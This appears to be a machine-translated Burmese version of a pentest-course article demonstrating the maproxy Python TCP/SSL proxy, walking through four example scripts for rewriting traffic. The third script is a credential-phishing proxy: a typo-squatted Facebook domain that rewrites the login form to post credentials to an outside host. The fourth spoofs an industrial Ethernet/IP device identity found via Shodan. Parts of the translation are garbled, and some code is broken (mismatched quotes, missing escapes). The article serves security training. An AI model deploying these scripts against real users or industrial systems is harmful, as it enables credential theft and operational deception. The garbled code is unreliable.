ကွန်ရက်ဒေတာကို အမြန်လုပ်ဆောင်ပါ။

ဆောင်းပါး၏ဘာသာပြန်ကို သင်တန်းစသည့်နေ့တွင် ပြင်ဆင်ခဲ့ပါသည်။ “Pentest ထိုးဖောက်စမ်းသပ်ခြင်းအလေ့အကျင့်".

မှတ်ချက်

ပုံမှန်ထိုးဖောက်စမ်းသပ်ခြင်းနှင့် Red Team လည်ပတ်မှုများမှ IoT/ICS စက်ပစ္စည်းများနှင့် SCADA တို့ကို ဟက်ကာအထိ လုံခြုံရေးအကဲဖြတ်ခြင်း အမျိုးအစားအမျိုးမျိုးတွင်၊ ဆိုလိုသည်မှာ ဖောက်သည်နှင့်ပစ်မှတ်ကြားတွင် ကွန်ရက်ဒေတာကို ကြားဖြတ်ခြင်းနှင့် ပြုပြင်မွမ်းမံခြင်းများ ပါဝင်ပါသည်။ ကျွန်ုပ်တို့တွင် Wireshark၊ Tcpdump သို့မဟုတ် Scapy ကဲ့သို့သော ကိရိယာများ ရှိသည်ဖြစ်သောကြောင့် ကွန်ရက်အသွားအလာကို ရှုရှိုက်ခြင်းသည် ခက်ခဲသောအလုပ်မဟုတ်ပါ၊ သို့သော် ကျွန်ုပ်တို့တွင် ကွန်ရက်ဒေတာကိုဖတ်ရန်၊ စစ်ထုတ်ရန်၊ ပြောင်းလဲရန် အင်တာဖေ့စ်တစ်မျိုးမျိုးရှိရန် လိုအပ်သောကြောင့် ပြုပြင်မွမ်းမံခြင်းမှာ ပိုမိုလုပ်အားအသင့်အတင့်ရှိသော အလုပ်တစ်ခုဖြစ်သည်။ ၎င်းကို အချိန်နှင့်တပြေးညီနီးပါး အချိန်နှင့်တပြေးညီ ပစ်မှတ်အိမ်ရှင်ထံ ပြန်လည်ပေးပို့ပါ။ ထို့အပြင်၊ ထိုသို့သောကိရိယာသည် အပြိုင်ချိတ်ဆက်မှုများအများအပြားဖြင့် အလိုအလျောက်အလုပ်လုပ်နိုင်ပြီး scripts များကိုအသုံးပြု၍ စိတ်ကြိုက်ပြင်ဆင်နိုင်လျှင် အကောင်းဆုံးဖြစ်လိမ့်မည်။

တစ်နေ့မှာ ကျွန်တော်ခေါ်တဲ့ tool တစ်ခုကို ရှာတွေ့ခဲ့တယ်။ maproxyစာရွက်စာတမ်းက ကျွန်တော့်ကို မြန်မြန်ဆန်ဆန်ပဲ ရှင်းလင်းစေတယ်။ maproxy - ငါလိုအပ်သောအရာသာ။ ၎င်းသည် ရိုးရိုးရှင်းရှင်း၊ စွယ်စုံရနှင့် အလွယ်တကူ သတ်မှတ်နိုင်သော TCP proxy တစ်ခုဖြစ်သည်။ အပြိုင်ချိတ်ဆက်မှုများစွာကို ကိုင်တွယ်ဖြေရှင်းနိုင်မလားဆိုတာ ကြည့်ဖို့ ICS စက်ပစ္စည်းတွေအပါအဝင် အတော်လေးရှုပ်ထွေးတဲ့ အပလီကေးရှင်းတော်တော်များများမှာ ဒီကိရိယာကို စမ်းသပ်ခဲ့ပြီး ကိရိယာက ကောင်းကောင်းလုပ်ဆောင်နိုင်မလား။

ဤဆောင်းပါးတွင် သင့်အား ကွန်ရက်ဒေတာကို အသုံးပြု၍ ပျံသန်းနေစဉ် လုပ်ဆောင်ခြင်းအကြောင်း မိတ်ဆက်ပေးပါမည်။ maproxy.

ယေဘုယျအမြင်

tool တစ်ခု maproxy Python ရှိ ရေပန်းစားပြီး ရင့်ကျက်သော အညီအညွတ် ကွန်ရက်ချိတ်ဆက်မှုဘောင်တစ်ခုဖြစ်သည့် Tornado ကို အခြေခံထားသည်။

ယေဘုယျအားဖြင့်၊ ၎င်းသည် မုဒ်များစွာဖြင့် လုပ်ဆောင်နိုင်သည်-

• TCP:TCP - ကုဒ်မထားသော TCP ချိတ်ဆက်မှုများ၊
• TCP:SSL и SSL:TCP - တစ်လမ်းသွား စာဝှက်စနစ်ဖြင့်၊
• SSL:SSL - နှစ်လမ်းကုဒ်ဝှက်ခြင်း။

စာကြည့်တိုက်အဖြစ် ရောက်ရှိလာသည်။ အမြန်စတင်ရန်အတွက်၊ ပင်မကိုထင်ဟပ်သော ဥပမာဖိုင်များကို သင်သုံးနိုင်သည်။ စာကြည့်တိုက်လုပ်ဆောင်ချက်များ:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

Case 1 – ရိုးရှင်းသော bidirectional proxy

ပေါ်အခြေခံကာ tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

ပုံမှန်အားဖြင့် ProxyServer() အငြင်းအခုံနှစ်ခု - ချိတ်ဆက်တည်နေရာနှင့် ပစ်မှတ်ဆိပ်ကမ်းကို ယူသည်။ server.listen() အဝင်ချိတ်ဆက်မှုကို နားထောင်ရန်အတွက် အငြင်းအခုံတစ်ခုကို ယူသည်။

ဇာတ်ညွှန်းကို လုပ်ဆောင်နေသည်-

# python tcp2tcp.py

စမ်းသပ်မှုကို လုပ်ဆောင်ရန်အတွက် ကျွန်ုပ်တို့သည် ကျွန်ုပ်တို့၏ proxy script မှတဆင့် ဒေသန္တရ SSH ဆာဗာသို့ ချိတ်ဆက်သွားမည်ဖြစ်ပါသည်။ 2222/tcp port နှင့် standard port တစ်ခုသို့ချိတ်ဆက်သည်။ 22/tcp SSH ဆာဗာများ-

ကျွန်ုပ်တို့၏နမူနာ script သည် ကွန်ရက်အသွားအလာကို အောင်မြင်စွာ proxy ပေးကြောင်း ကြိုဆိုသောနဖူးစည်းက သင့်အား အသိပေးသည်။

Case 2 – ဒေတာမွမ်းမံခြင်း။

နောက်ထပ် ဒီမို ဇာတ်ညွှန်း logging_proxy.py ကွန်ရက်ဒေတာနှင့် အပြန်အလှန်ဆက်သွယ်ရန်အတွက် အကောင်းဆုံးဖြစ်သည်။ ဖိုင်ရှိမှတ်ချက်များသည် သင့်ရည်မှန်းချက်အောင်မြင်ရန် သင်မွမ်းမံနိုင်သည့် အတန်းအစားနည်းလမ်းများကို ဖော်ပြသည်-

စိတ်ဝင်စားစရာအကောင်းဆုံးက ဒီမှာ

• on_c2p_done_read - client မှ server သို့သွားရာလမ်းတစ်လျှောက် data ကိုကြားဖြတ်ရန်။
• on_p2s_done_read - ပြောင်းပြန်။

ဆာဗာသည် ကလိုင်းယင့်ထံ ပြန်သွားသည့် SSH အလံကို ပြောင်းကြည့်ကြပါစို့။

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

ဇာတ်ညွှန်းကို လုပ်ဆောင်ပါ-

သင်တွေ့မြင်ရသည့်အတိုင်း၊ သူ့အတွက် SSH ဆာဗာအမည်ကို ပြောင်းထားသောကြောင့် သုံးစွဲသူသည် လမ်းလွဲသွားခဲ့သည်။ «DumnySSH».

Case 3 – ရိုးရှင်းသော phishing ဝဘ်စာမျက်နှာ

ဤကိရိယာကိုအသုံးပြုရန် အဆုံးမရှိသောနည်းလမ်းများရှိသည်။ ဒီတစ်ခါမှာတော့ Red Team ရဲ့ လုပ်ဆောင်ချက်တွေကို ပိုပြီး လက်တွေ့ကျကျ အာရုံစိုက်ကြည့်ရအောင်။ ဆင်းသက်သည့်စာမျက်နှာကို အတုယူကြပါစို့ m.facebook.com ဥပမာအားဖြင့် တမင်သက်သက် typo ဖြင့် စိတ်ကြိုက်ဒိုမိန်းကို အသုံးပြုပါ၊ m.facebok.com. သရုပ်ပြရည်ရွယ်ချက်အတွက်၊ ဒိုမိန်းကို ကျွန်ုပ်တို့မှ မှတ်ပုံတင်ထားသည်ဟု ယူဆကြပါစို့။

ကျွန်ုပ်တို့သည် ကျွန်ုပ်တို့၏ သားကောင်များ ပရောက်စီနှင့် SSL တိုက်ရိုက်လွှင့်ခြင်းတို့ဖြင့် Facebook ဆာဗာသို့ ကုဒ်ဝှက်မထားသော ကွန်ရက်ချိတ်ဆက်မှုကို တည်ထောင်သွားပါမည် (31.13.81.36) ဤနမူနာကို အလုပ်ဖြစ်စေရန်၊ ကျွန်ုပ်တို့သည် HTTP host header ကို အစားထိုးပြီး မှန်ကန်သော hostname ကို ထည့်သွင်းရန် လိုအပ်ပြီး အကြောင်းအရာများကို အလွယ်တကူ ဝင်ရောက်နိုင်စေရန် တုံ့ပြန်မှုချုံ့မှုကိုလည်း ပိတ်ပါမည်။ နောက်ဆုံးတွင် ကျွန်ုပ်တို့သည် Facebook ၏ဆာဗာများအစား အကောင့်ဝင်ခြင်းအထောက်အထားများကို ကျွန်ုပ်တို့ထံပေးပို့နိုင်ရန် HTML ဖောင်ကို အစားထိုးပါမည်။

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/my/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

ရလဒ်အဖြစ်:

သင်တွေ့မြင်ရသည့်အတိုင်း၊ ကျွန်ုပ်တို့သည် မူရင်းဆိုက်ကို အောင်မြင်စွာ အစားထိုးနိုင်ခဲ့သည်။

Case 4 – Ethernet/IP ကို ​​ပို့ခြင်း။

ပရိုဂရမ်လုပ်နိုင်သော ထိန်းချုပ်ကိရိယာများ (PLC)၊ I/O modules၊ drives၊ relays၊ ladder programming ပတ်၀န်းကျင်နှင့် အခြားအရာများစွာကဲ့သို့သော စက်မှုစက်ပစ္စည်းများနှင့် ဆော့ဖ်ဝဲလ် (ICS/SCADA) တို့နှင့် အချိန်အတော်ကြာအောင် ကိုင်တွယ်နေပါသည်။ ဤကိစ္စသည် စက်မှုလုပ်ငန်းကို နှစ်သက်သူများအတွက် ဖြစ်သည်။ ထိုသို့သော ဖြေရှင်းချက်များအား ဟက်ကာသည် ကွန်ရက်ပရိုတိုကောများဖြင့် တက်ကြွစွာ ကစားခြင်း ပါဝင်သည်။ အောက်ပါဥပမာတွင်၊ ICS/SCADA ကွန်ရက်အသွားအလာကို သင်မွမ်းမံနိုင်ပုံကို ပြသလိုပါသည်။

၎င်းအတွက် အောက်ပါတို့ကို လိုအပ်ပါမည်။

• Network sniffer ဥပမာ Wireshark;
• Ethernet/IP သို့မဟုတ် SIP စက်တစ်ခုမျှသာ၊ Shodan ဝန်ဆောင်မှုကို အသုံးပြု၍ ၎င်းကို သင်ရှာတွေ့နိုင်ပါသည်။
• ကျွန်ုပ်တို့၏ ဇာတ်ညွှန်းသည် အခြေခံဖြစ်သည်။ maproxy.

ဦးစွာ၊ CIP (Common Industrial Protocol) မှ ပုံမှန်သတ်မှတ်ခြင်းဆိုင်ရာ တုံ့ပြန်မှုအား ကြည့်ပါ-

CIP ကဲ့သို့သော ပရိုတိုကောများကို ထိန်းချုပ်သည့် စက်မှုအီသာနက်ပရိုတိုကော၏ အဆင့်မြှင့်ဗားရှင်းဖြစ်သည့် Ethernet/IP ပရိုတိုကောကို အသုံးပြု၍ စက်ပစ္စည်း ခွဲခြားသတ်မှတ်ခြင်းကို ပြီးမြောက်စေသည်။ ကျွန်ုပ်တို့သည် စခရင်ရှော့တွင်မြင်ရသော မီးမောင်းထိုးပြထားသော ID အမည်ကို ပြောင်းလဲပါမည်။ Ethernet အတွက် "NI-IndComm" ကျွန်ုပ်တို့၏ proxy script ကို အသုံးပြု. ဇာတ်ညွှန်းကို ပြန်သုံးလို့ရတယ်။ logging_proxy.py နှင့် အလားတူ အတန်းနည်းလမ်းကို ပြင်ဆင်ပါ။ on_p2s_done_readအဘယ်ကြောင့်ဆိုသော် ကျွန်ုပ်တို့သည် မတူညီသော အထောက်အထားအမည်တစ်ခုကို ကလိုင်းယင့်တွင် မြင်တွေ့စေလိုသောကြောင့်ဖြစ်သည်။

ကုဒ်:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

အခြေခံအားဖြင့်၊ ကျွန်ုပ်တို့သည် စက်ပစ္စည်း အထောက်အထားကို နှစ်ကြိမ်တိုင်တိုင် တောင်းဆိုခဲ့ပြီး၊ ဒုတိယတုံ့ပြန်မှုသည် မူရင်းဖြစ်ပြီး ပထမတစ်ခုသည် ပျံသန်းမှုတွင် ပြုပြင်မွမ်းမံထားသည်။

နောက်ဆုံး

ကျနော့်အမြင်ခုနှစ်တွင် maproxy Python နဲ့လည်းရေးထားလို့ အဆင်ပြေပြီး ရိုးရှင်းတဲ့ tool တစ်ခုမို့ သင်လည်း ၎င်းကိုအသုံးပြုခြင်းကနေ အကျိုးရှိနိုင်မယ်လို့ ယုံကြည်ပါတယ်။ ဟုတ်ပါတယ်၊ ကွန်ရက်ဒေတာကို လုပ်ဆောင်ခြင်းနှင့် ပြုပြင်မွမ်းမံခြင်းအတွက် ပိုမိုရှုပ်ထွေးသောကိရိယာများ ရှိသည်၊ သို့သော် ၎င်းတို့ကိုလည်း ပိုမိုအာရုံစိုက်ရန်လိုအပ်ပြီး တိကျသောအသုံးပြုမှုကိစ္စတစ်ခုအတွက် ဖန်တီးထားလေ့ရှိသည် ဥပမာ၊ ဥပမာ။ မူရာနာ, Modlishka သို့မဟုတ် evilginx တတိယကိစ္စများအတွက်၊ သို့မဟုတ် canape နောက်ဆုံးကိစ္စအတွက်။ တစ်နည်းမဟုတ်တစ်နည်း အကူအညီဖြင့် maproxy ဥပမာ script များသည် အလွန်ရှင်းလင်းသောကြောင့် ကွန်ရက်ဒေတာကို ကြားဖြတ်ကြားဖြတ်ခြင်းအတွက် သင့်စိတ်ကူးများကို လျင်မြန်စွာအကောင်အထည်ဖော်နိုင်သည်။

Windows AD တွင် စစ်မှန်ကြောင်းအထောက်အထားပြခြင်း ယန္တရားများကို စမ်းသပ်ခြင်း။

source: www.habr.com